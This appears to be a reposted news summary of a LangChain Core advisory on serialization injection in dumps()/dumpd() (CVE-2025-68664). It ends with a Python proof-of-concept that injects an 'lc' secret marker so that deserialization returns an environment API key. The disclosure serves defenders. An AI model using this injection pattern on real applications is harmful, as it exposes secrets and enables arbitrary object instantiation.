Critical LangChain Core Vulnerability Exposes Secrets via Serialization Injection
Briefly

"A critical security flaw has been disclosed in LangChain Core that could be exploited by an attacker to steal sensitive secrets and even influence large language model (LLM) responses through prompt injection. LangChain Core (i.e., langchain-core) is a core Python package that's part of the LangChain ecosystem, providing the core interfaces and model-agnostic abstractions for building applications powered by LLMs."
""A serialization injection vulnerability exists in LangChain's dumps() and dumpd() functions," the project maintainers said in an advisory. "The functions do not escape dictionaries with 'lc' keys when serializing free-form dictionaries." "The 'lc' key is used internally by LangChain to mark serialized objects. When user-controlled data contains this key structure, it is treated as a legitimate LangChain object during deserialization rather than plain user data.""
LangChain Core contains a serialization injection vulnerability in its dumps() and dumpd() functions, which do not escape dictionaries containing the 'lc' key. Because the 'lc' key marks LangChain objects in the framework's internal serialization format, user-controlled data that mimics this structure is treated as a LangChain object during deserialization rather than as plain data. An attacker who can get such data serialized and later deserialized can instantiate arbitrary unsafe objects. Potential impacts include extraction of environment secrets when deserialization is performed with secrets_from_env=True and instantiation of classes from trusted namespaces such as langchain_core, langchain, and langchain_community. The flaw is tracked as CVE-2025-68664 and codenamed LangGrinch.
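
To make the injection shape concrete, here is a minimal Python sketch of the mechanism as the advisory describes it, assuming a vulnerable langchain-core version is installed. The wrapper dict, the "note"/"extra" field names, and the OPENAI_API_KEY variable are illustrative choices, not taken from the advisory, and this is a conceptual illustration rather than a working exploit.

import os
from langchain_core.load import dumps, loads

# Attacker-controlled data that mimics LangChain's internal marker for a
# serialized secret: {"lc": 1, "type": "secret", "id": [...]}.
user_supplied = {"lc": 1, "type": "secret", "id": ["OPENAI_API_KEY"]}

# A vulnerable dumps() serializes this free-form dict without escaping the
# 'lc' key, so the output is indistinguishable from a genuine LangChain object.
blob = dumps({"note": "user metadata", "extra": user_supplied})

# On deserialization, the injected structure is treated as a real secret
# reference. With secrets resolved from the environment (the
# secrets_from_env=True setting named in the advisory), it comes back as the
# value of the environment variable rather than as plain user data.
os.environ.setdefault("OPENAI_API_KEY", "sk-demo-placeholder")
restored = loads(blob, secrets_from_env=True)
print(restored["extra"])  # on vulnerable versions, prints the environment variable's value

The same pattern applies to the "constructor" form of the serialization format, which is what allows instantiation of classes from the trusted langchain_core, langchain, and langchain_community namespaces.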
Read at The Hacker News